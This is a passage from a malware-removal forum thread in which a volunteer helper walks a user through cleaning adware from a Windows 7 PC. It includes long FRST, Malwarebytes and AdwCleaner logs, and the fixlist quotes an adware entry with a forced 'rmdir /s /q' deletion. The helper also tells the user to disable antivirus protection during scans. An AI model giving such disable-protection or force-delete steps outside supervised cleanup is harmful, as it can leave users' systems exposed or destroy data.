[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD15 EARS-22MVWB0 SATA Disk Device +++++
--- User ---
[MBR] f5f7efdfdb25012c0d61711481e48fad
[BSP] 14bb5f0af543e71519c3aef065759dfb : Windows Vista/7/8 MBR Code
Partition table:
0 - [XXXXXX] ACER (0x27) [VISIBLE] Offset (sectors): 2048 | Size: 18432 MB
1 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 37750784 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 37955584 | Size: 1412265 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: Generic USB SD Reader USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )

+++++ PhysicalDrive2: Generic USB CF Reader USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )

+++++ PhysicalDrive3: Generic USB xD/SM Reader USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )

+++++ PhysicalDrive4: Generic USB MS Reader USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )

+++++ PhysicalDrive5: Generic Mini SD Reader USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )


Thanks again for your help!

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7656
Re: [Resolved - K] Pop ups
« Reply #4 on: January 21, 2015, 04:17:34 AM »
Thanks for the logs, continue as follows:

Upload a File to Virustotal

Go to http://www.virustotal.com/

  • Click the Choose file button
  • Navigate to the file C:\Windows\system32\Drivers\67F23A27.sys
  • Click the Scan it tab
  • If you get a message saying File has already been analyzed: click Reanalyze file now
  • Copy and paste the results back here please.
  • Repeat the above steps for the following files

C:\Windows\system32\Drivers\12D43959.sys

Next,

Download attached fixlist.txt file (end of reply) and save it to the Desktop, or the folder you saved FRST into.
NOTE. It's important that both FRST and fixlist.txt are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt) or the folder it was run from. Please post it to your reply.

Next,

Open Malwarebytes Anti-Malware, from the Dashboard please Check for Updates by clicking the Update Now... link
When the update completes select > Settings > Detection and Protection > Enable Scan for rootkit and Under Non Malware Protection set both PUP and PUM to Treat detections as malware.


Click on the SCAN button and run a Threat Scan with Malwarebytes Anti-Malware by clicking the Scan Now>> button.

When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.


In most cases, a restart will be required.


Wait for the prompt to restart the computer to appear, then click on Yes.


When the scan is completed from the main GUI click on History > Application Logs. Find your scan log, the date when run will identify it. Checkmark "select" box > then hit the "view" button. The history log window will open. At the bottom of that window are two options, "Copy to clipboard" and "Export"
Select > "Copy to clipboard" that copies the full log to the windows clipboard, so at your reply you right click into the text field and select "Paste" the log is pasted (copied) to  your reply.

Or select "Export" you are given the option to export as a Text file (*.txt) or XML file (*.xml) Choose text file, save the exported file to a place of your choice. That file can be attached to your reply...

Next,

Download AdwCleaner by Xplode onto your Desktop.
  • Double click on Adwcleaner.exe to run the tool.
  • Click on Scan
  • Once the scan is done, click on the Clean button.
  • You will get a prompt asking to close all programs. Click OK.
  • Click OK again to reboot your computer.
  • A text file will open after the restart. Please post the content of that logfile in your reply.
  • You can also find the logfile at C:\AdwCleaner[Sn].txt, where n is the scan reference number.
Next,

Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts. (re-enable when done)
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.

Next,

Download Microsoft's "Malicious Software Removal Tool" and save direct to the desktop
Ensure to get the correct version for your system....
32 Bit version:
https://www.microsoft.com/downloads/en/confirmation.aspx?FamilyId=AD724AE0-E72D-4F54-9AB3-75B8EB148356&displaylang=en
64 Bit version:
https://www.microsoft.com/downloads/en/confirmation.aspx?FamilyId=585D2BDE-367F-495E-94E7-6349F4EFFC74&displaylang=en

Right click on the Tool, select “Run as Administrator” the tool will expand to the options Window
In the "Scan Type" window, select Quick Scan
Perform a scan and  Click Finish when the scan is done.
Retrieve the MSRT log as follows, and post it in your next reply:

1) Select the Windows key and R key together to open the "Run" function
2) Type or Copy/Paste the following command to the "Run Line" and Press Enter:

notepad c:\windows\debug\mrt.log

Next,

Scan with ZOEK

Please download ZOEK by Smeenk from here: http://hijackthis.nl/smeenk/ and save it to your desktop (preferred version is the *.exe one)
Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.

  • Right-click on icon and select Run as Administrator to start the tool.
  • Wait patiently until the main console will appear, it may take a minute or two.
  • In the main box please paste in the following script:

services_list;
standardsearch;
autoclean;
emptyclsid;
emptyfolderscheck;delete
iedefaults;
firefoxlook;
chromelook;
FFdefaults;
CHRdefaults;


  • Make sure that Scan All Users option is checked.
  • Push Run Script and wait patiently. The scan may take a couple of minutes.
  • When the scan completes, a zoek-results logfile should open in notepad.
  • If a reboot is needed, it will be opened after it. You may also find it at your main drive (usually C:\ drive)

Please include its content in your next reply. Don't forget to re-enable security software!

Let me see those logs in your next reply, also give an update on any remaining issues or concerns...

Thanks,

Kevin....


Offline kobra

  • Bronze Member
  • Posts: 18
Re: [Resolved - K] Pop ups
« Reply #5 on: January 22, 2015, 10:14:00 PM »
Thank you for looking at all these scans.  No, I haven't had any other problems so far.  I haven't been using it a whole lot though.

Due to length restrictions I have attached the logs in 3 parts. 

Part 1 (VirusTotal & FRST & MalwareBytes)

Here are the results of the VirusTotal scans.  I wasn't sure what you wanted pasted in, but with the hash, you can look up the results yourself.  Neither file had any positive matches.

#################################################################################################################
67F23A27.sys:
SHA256:    6238fb8e785652040cce3e7044ea52066ce1bf173a1467474d64a3ab214b6bcd
File name:    67F23A27.sys
Detection ratio:    0 / 56
Analysis date:    2015-01-22 05:18:12 UTC ( 1 minute ago )
Probably harmless! There are strong indicators suggesting that this file is safe to use.

#################################################################################################################
12D43959.sys:
SHA256:    6238fb8e785652040cce3e7044ea52066ce1bf173a1467474d64a3ab214b6bcd
File name:    12D43959.sys
Detection ratio:    0 / 56
Analysis date:    2015-01-22 05:32:33 UTC ( 3 minutes ago )


#################################################################################################################
Fixlog from FRST:
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 19-01-2015
Ran by Bonnie at 2015-01-21 22:39:43 Run:1
Running from C:\Users\Admin\Desktop
Loaded Profiles: Bonnie & Admin (Available profiles: Bonnie & Admin)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
start
HKU\S-1-5-18\...\RunOnce: [SpUninstallDeleteDir] => rmdir /s /q "\SearchProtect"
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
SearchScopes: HKLM-x32 -> {9a216821-0ec5-49a3-85ac-fb72ae79a1e8} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^Y6^xdm003^S06927^us&si=CPC7u9_BzrkCFeqDQgodWCsAaw&ptb=7591A84B-239C-40EE-A83E-84C8EA746CC3&ind=2013091522&n=77fd56c2&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {30BFC086-8BB7-466F-8E12-0A89A3B33C6C} URL = http://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=dsites&cd=2XzuyEtN2Y1L1QzutAzzyCtDyByByD0D0Fzz0F0D0D0CyD0AtN0D0Tzu0SyBzyyDtN1L2XzutBtFtCyBtFtDtFtCtN1L1CzutDtBtCtC1V1PtN1L1G1B1V1N2Y1L1Qzu2SyEtDyEyCyE0FyByBtGyB0CtAtBtGtDtAyEzytG0FyC0F0FtGyCyDzy0F0BtDyEyDtD0AyCyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyCyB0CyDyCzz0DzztG0B0FyCyDtGtBtDzyyEtGtCtDzyyDtGtDtB0E0CyByCtCyC0CzzyBtA2Q&cr=1308762248&ir=
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {47287947-90A5-41BC-A98B-24214FA5ECE9} URL = https://search.yahoo.com/search?fr=mcafee&type=B010US739D20120919&p={SearchTerms}
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {55D8CC73-D9F8-4F92-8EAE-0081BE423565} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3196716
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {88BA080D-DF1A-45D2-8CE2-8461E30FBFFE} URL = http://search.netzero.net/search?action=search&source=browserboxapp&query={searchTerms}
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {96bd48dd-741b-41ae-ac4a-aff96ba00f7e} URL = http://search.coupons.com/search.asp?p=df&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {9a216821-0ec5-49a3-85ac-fb72ae79a1e8} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^Y6^xdm003^S06927^us&si=CPC7u9_BzrkCFeqDQgodWCsAaw&ptb=7591A84B-239C-40EE-A83E-84C8EA746CC3&ind=2013091522&n=77fd56c2&psa=&st=sb&searchfor={searchTerms}
BHO: caoupoNpEaK -> {01050D05-D546-B8DC-954D-8334A8A7BF5A} -> C:\ProgramData\caoupoNpEaK\_1Y.x64.dll No File
BHO: AudioCeonvaeert -> {2F344960-763E-9E6C-E973-25241A34D54E} -> C:\ProgramData\AudioCeonvaeert\mRE8_SdP.x64.dll No File
BHO: DiscounntLoCaatOr -> {39dd84e0-d7e2-4b5c-88df-6bfebdce6716} -> C:\ProgramData\DiscounntLoCaatOr\4hvGyEzAwMBtBM.x64.dll ()
BHO: SaoftiCoup -> {b2ba0648-6833-4057-aaa1-bf9c473dd360} -> C:\ProgramData\SaoftiCoup\HDwI4jNxyFjYaK.x64.dll ()
BHO: PrinCECCoupon -> {B4552D3D-6B41-9AF1-3067-72A066972344} -> C:\ProgramData\PrinCECCoupon\jsih.x64.dll No File
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.130\McAfeeMSS_IE.dll No File
BHO-x32: No Name -> {39dd84e0-d7e2-4b5c-88df-6bfebdce6716} ->  No File
BHO-x32: No Name -> {b2ba0648-6833-4057-aaa1-bf9c473dd360} ->  No File
Toolbar: HKLM-x32 - FromDocToPDF - {c66a678d-5e6c-4af9-8f57-c6192f42cf74} - C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65bar.dll No File
Toolbar: HKLM-x32 - No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
Toolbar: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
Toolbar: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> No Name - {C66A678D-5E6C-4AF9-8F57-C6192F42CF74} -  No File
DPF: HKLM-x32 {E4D88471-7ED7-43E1-B290-205559E8EBB2} https://my.madisonhospital.org/mig/mae/login/Browser%20Logoff.dll
DPF: HKLM-x32 {ECB7BFF0-FF65-11D1-9004-00A0C92E6878} https://my.madisonhospital.org/mig/mae/login/MWebEnable.dll
S1 BHDrvx64; \??\C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_19.0.0.128\Definitions\BASHDefs\20120711.002\BHDrvx64.sys [X]
S3 NAVENG; \??\C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_19.0.0.128\Definitions\VirusDefs\20120727.033\ENG64.SYS [X]
S3 NAVEX15; \??\C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_19.0.0.128\Definitions\VirusDefs\20120727.033\EX64.SYS [X]
S1 qknfd; system32\drivers\qknfd.sys [X]
C:\windows\system32\drivers\qknfd.sys
C:\ProgramData\DiscounntLoCaatOr
C:\ProgramData\SaoftiCoup
C:\ProgramData\PrinCECCoupon
C:\Program Files (x86)\Uniqoupons
C:\Program Files (x86)\Optimizer Pro
C:\Users\Bonnie\jobq (1).dat
C:\Users\Bonnie\jobq (2).dat
C:\Users\Bonnie\jobq.dat
C:\Users\Bonnie\AppData\Local\Temp\autorun.dll
C:\Users\Bonnie\AppData\Local\Temp\COMAP.EXE
C:\Users\Bonnie\AppData\Local\Temp\Couponscom.exe
C:\Users\Bonnie\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpnzo84j.dll
C:\Users\Bonnie\AppData\Local\Temp\fp_pl_pfs_installer.exe
C:\Users\Bonnie\AppData\Local\Temp\_is6A1B.exe
Task: {224B946F-8456-4B76-B6A5-CC5D802F83D2} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Internet Security\Engine\19.9.1.14\WSCStub.exe
C:\Program Files (x86)\Norton Internet Security
Task: {3E4DBC7D-7F19-4D96-BC4B-4539E3201C58} - System32\Tasks\Norton Internet Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Internet Security\Engine\19.9.1.14\SymErr.exe
Task: {D8E2FD8D-CCA1-48A5-AADF-3AA2FC346D7D} - System32\Tasks\Norton Internet Security\Norton Error Processor => C:\Program Files (x86)\Norton Internet Security\Engine\19.9.1.14\SymErr.exe
Emptytemp:
end



*****************

HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SpUninstallDeleteDir => Value could not be deleted.
HKLM\SOFTWARE\Policies\Google => Key could not be deleted. Access denied.
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => Key could not be deleted. Access denied.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{9a216821-0ec5-49a3-85ac-fb72ae79a1e8} => Key could not be deleted. Access denied.
HKCR\Wow6432Node\CLSID\{9a216821-0ec5-49a3-85ac-fb72ae79a1e8} => Key not found.
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{30BFC086-8BB7-466F-8E12-0A89A3B33C6C} => Key could not be deleted. Access denied.
HKCR\CLSID\{30BFC086-8BB7-466F-8E12-0A89A3B33C6C} => Key not found.
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{47287947-90A5-41BC-A98B-24214FA5ECE9} => Key could not be deleted. Access denied.
HKCR\CLSID\{47287947-90A5-41BC-A98B-24214FA5ECE9} => Key not found.
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{55D8CC73-D9F8-4F92-8EAE-0081BE423565} => Key could not be deleted. Access denied.
HKCR\CLSID\{55D8CC73-D9F8-4F92-8EAE-0081BE423565} => Key not found.
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{88BA080D-DF1A-45D2-8CE2-8461E30FBFFE} => Key could not be deleted. Access denied.
HKCR\CLSID\{88BA080D-DF1A-45D2-8CE2-8461E30FBFFE} => Key not found.
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{96bd48dd-741b-41ae-ac4a-aff96ba00f7e} => Key could not be deleted. Access denied.
HKCR\CLSID\{96bd48dd-741b-41ae-ac4a-aff96ba00f7e} => Key not found.
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9a216821-0ec5-49a3-85ac-fb72ae79a1e8} => Key could not be deleted. Access denied.
HKCR\CLSID\{9a216821-0ec5-49a3-85ac-fb72ae79a1e8} => Key not found.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{01050D05-D546-B8DC-954D-8334A8A7BF5A} => Key could not be deleted. Access denied.
HKCR\CLSID\{01050D05-D546-B8DC-954D-8334A8A7BF5A} => Key could not be deleted. Access denied.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2F344960-763E-9E6C-E973-25241A34D54E} => Key could not be deleted. Access denied.
HKCR\CLSID\{2F344960-763E-9E6C-E973-25241A34D54E} => Key could not be deleted. Access denied.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{39dd84e0-d7e2-4b5c-88df-6bfebdce6716} => Key could not be deleted. Access denied.
HKCR\CLSID\{39dd84e0-d7e2-4b5c-88df-6bfebdce6716} => Key could not be deleted. Access denied.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{b2ba0648-6833-4057-aaa1-bf9c473dd360} => Key could not be deleted. Access denied.
HKCR\CLSID\{b2ba0648-6833-4057-aaa1-bf9c473dd360} => Key could not be deleted. Access denied.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4552D3D-6B41-9AF1-3067-72A066972344} => Key could not be deleted. Access denied.
HKCR\CLSID\{B4552D3D-6B41-9AF1-3067-72A066972344} => Key could not be deleted. Access denied.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0E8A89AD-95D7-40EB-8D9D-083EF7066A01} => Key could not be deleted. Access denied.
HKCR\Wow6432Node\CLSID\{0E8A89AD-95D7-40EB-8D9D-083EF7066A01} => Key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{39dd84e0-d7e2-4b5c-88df-6bfebdce6716} => Key could not be deleted. Access denied.
HKCR\Wow6432Node\CLSID\{39dd84e0-d7e2-4b5c-88df-6bfebdce6716} => Key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{b2ba0648-6833-4057-

aaa1-bf9c473dd360} => Key could not be deleted. Access denied.
HKCR\Wow6432Node\CLSID\{b2ba0648-6833-4057-aaa1-bf9c473dd360} => Key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{c66a678d-5e6c-4af9-8f57-c6192f42cf74} => Value

could not be deleted.
HKCR\Wow6432Node\CLSID\{c66a678d-5e6c-4af9-8f57-c6192f42cf74} => Key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => Value

could not be deleted.
HKCR\Wow6432Node\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => Key not found.
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\

\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => value deleted successfully.
HKCR\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => Key not found.
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\

\{C66A678D-5E6C-4AF9-8F57-C6192F42CF74} => value deleted successfully.
HKCR\CLSID\{C66A678D-5E6C-4AF9-8F57-C6192F42CF74} => Key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Code Store Database\Distribution Units\{E4D88471-7ED7-43E1-B290-205559E8EBB2}

=> Key could not be deleted. Access denied.
HKCR\Wow6432Node\CLSID\{E4D88471-7ED7-43E1-B290-205559E8EBB2} => Key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Code Store Database\Distribution Units\{ECB7BFF0-FF65-11D1-9004-00A0C92E6878}

=> Key could not be deleted. Access denied.
HKCR\Wow6432Node\CLSID\{ECB7BFF0-FF65-11D1-9004-00A0C92E6878} => Key not found.
BHDrvx64 => Error deleting Service
NAVENG => Error deleting Service
NAVEX15 => Error deleting Service
qknfd => Error deleting Service
"C:\windows\system32\drivers\qknfd.sys" => File/Directory not found.

"C:\ProgramData\DiscounntLoCaatOr" directory move:

Could not move "C:\ProgramData\DiscounntLoCaatOr\4hvGyEzAwMBtBM.dat" => Scheduled to move on reboot.
Could not move "C:\ProgramData\DiscounntLoCaatOr\4hvGyEzAwMBtBM.tlb" => Scheduled to move on reboot.
Could not move "C:\ProgramData\DiscounntLoCaatOr\4hvGyEzAwMBtBM.x64.dll" => Scheduled to move on reboot.
Could not move "C:\ProgramData\DiscounntLoCaatOr" directory. => Scheduled to move on reboot.


"C:\ProgramData\SaoftiCoup" directory move:

Could not move "C:\ProgramData\SaoftiCoup\HDwI4jNxyFjYaK.dat" => Scheduled to move on reboot.
Could not move "C:\ProgramData\SaoftiCoup\HDwI4jNxyFjYaK.tlb" => Scheduled to move on reboot.
Could not move "C:\ProgramData\SaoftiCoup\HDwI4jNxyFjYaK.x64.dll" => Scheduled to move on reboot.
Could not move "C:\ProgramData\SaoftiCoup" directory. => Scheduled to move on reboot.


"C:\ProgramData\PrinCECCoupon" directory move:

Could not move "C:\ProgramData\PrinCECCoupon\jsih.dat" => Scheduled to move on reboot.
Could not move "C:\ProgramData\PrinCECCoupon\jsih.tlb" => Scheduled to move on reboot.
Could not move "C:\ProgramData\PrinCECCoupon" directory. => Scheduled to move on reboot.


"C:\Program Files (x86)\Uniqoupons" directory move:

Could not move "C:\Program Files (x86)\Uniqoupons\funcoupons.dll.vir" => Scheduled to move on reboot.
Could not move "C:\Program Files (x86)\Uniqoupons" directory. => Scheduled to move on reboot.


"C:\Program Files (x86)\Optimizer Pro" directory move:

Could not move "C:\Program Files (x86)\Optimizer Pro" directory. => Scheduled to move on reboot.

C:\Users\Bonnie\jobq (1).dat => Moved successfully.
C:\Users\Bonnie\jobq (2).dat => Moved successfully.
C:\Users\Bonnie\jobq.dat => Moved successfully.
C:\Users\Bonnie\AppData\Local\Temp\autorun.dll => Moved successfully.
C:\Users\Bonnie\AppData\Local\Temp\COMAP.EXE => Moved successfully.
C:\Users\Bonnie\AppData\Local\Temp\Couponscom.exe => Moved successfully.
"C:\Users\Bonnie\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpnzo84j.dll" => File/Directory not found.
C:\Users\Bonnie\AppData\Local\Temp\fp_pl_pfs_installer.exe => Moved successfully.
C:\Users\Bonnie\AppData\Local\Temp\_is6A1B.exe => Moved successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{224B946F-8456-4B76-B6A5-CC5D802F83D2} => Key could not be deleted. Access denied.
C:\Windows\System32\Tasks\Norton WSC Integration not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Norton WSC Integration => Key could not be deleted. Access denied.
"C:\Program Files (x86)\Norton Internet Security" => File/Directory not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3E4DBC7D-7F19-4D96-BC4B-4539E3201C58} => Key could not be deleted. Access denied.
Could not move "C:\Windows\System32\Tasks\Norton Internet Security\Norton Error Analyzer" => Scheduled to move on reboot.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Norton Internet Security\Norton Error Analyzer => Key could not be deleted. Access denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D8E2FD8D-CCA1-48A5-AADF-3AA2FC346D7D} => Key could not be deleted. Access denied.
Could not move "C:\Windows\System32\Tasks\Norton Internet Security\Norton Error Processor" => Scheduled to move on reboot.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Norton Internet Security\Norton Error Processor => Key could not be deleted. Access denied.
EmptyTemp: => Removed 3.9 GB temporary data.


#################################################################################################################
There were no positives found from MalwareBytes:

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 1/21/2015
Scan Time: 10:54:50 PM
Logfile: 150121_MalwareBytesScanResults.txt
Administrator: Yes

Version: 2.00.4.1028
Malware Database: v2015.01.22.03
Rootkit Database: v2015.01.14.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Admin

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 393337
Time Elapsed: 17 min, 58 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)

Offline kobra

  • Bronze Member
  • Posts: 18
Re: [Resolved - K] Pop ups
« Reply #6 on: January 22, 2015, 10:14:59 PM »
Part 2 (AdwCleaner & Junkware Removal Tool)
#################################################################################################################
AdwCleaner

There were two log files in the directory you referenced; I have pasted them both below:

AdwCleaner[R0].txt:
-------------------
# AdwCleaner v4.108 - Report created 21/01/2015 at 23:27:28
# Updated 17/01/2015 by Xplode
# Database : 2015-01-22.2 [Live]
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Admin - LAWRENCE2
# Running from : C:\Users\Admin\Desktop\AdwCleaner.exe
# Option : Scan

***** [ Services ] *****

Service Found : qknfd

***** [ Files / Folders ] *****

File Found : \END
File Found : C:\Users\Bonnie\AppData\Roaming\Mozilla\Firefox\Profiles\7rgneeol.default\user.js
Folder Found : C:\Program Files (x86)\Conduit
Folder Found : C:\Program Files (x86)\Optimizer Pro
Folder Found : C:\Program Files (x86)\saveron
Folder Found : C:\Program Files\Conduit
Folder Found : C:\ProgramData\2fcd61ef531c55b0
Folder Found : C:\ProgramData\3444516970527741360
Folder Found : C:\ProgramData\caoupoNpEaK
Folder Found : C:\ProgramData\ClIckForSalie
Folder Found : C:\ProgramData\DiscounntLoCaatOr
Folder Found : C:\ProgramData\KinngCouupon
Folder Found : C:\ProgramData\PrinCECCoupon
Folder Found : C:\ProgramData\SalesMagnet
Folder Found : C:\ProgramData\SaoftiCoup
Folder Found : C:\ProgramData\saveron
Folder Found : C:\Users\Bonnie\AppData\Local\Conduit
Folder Found : C:\Users\Bonnie\AppData\Local\iac
Folder Found : C:\Users\Bonnie\AppData\Local\NativeMessaging
Folder Found : C:\Users\Bonnie\AppData\LocalLow\Conduit
Folder Found : C:\Users\Bonnie\AppData\LocalLow\iac
Folder Found : C:\Users\Bonnie\AppData\LocalLow\Toolbar4
Folder Found : C:\Users\Bonnie\AppData\Roaming\DigitalSites
Folder Found : C:\Users\Bonnie\AppData\Roaming\ValueApps
Folder Found : C:\Users\Bonnie\Documents\Optimizer Pro
Folder Found : C:\Users\Bonnie\Documents\Updater
Folder Found : C:\Windows\SysWOW64\SearchProtect

***** [ Scheduled Tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{C66A678D-5E6C-4AF9-8F57-C6192F42CF74}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C66A678D-5E6C-4AF9-8F57-C6192F42CF74}
Key Found : HKLM\SOFTWARE\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Found : HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Key Found : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Found : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Key Found : HKLM\SOFTWARE\Classes\.
Key Found : HKLM\SOFTWARE\Classes\..9
Key Found : HKLM\SOFTWARE\Classes\AppID\{09C554C3-109B-483C-A06B-F14172F1A947}
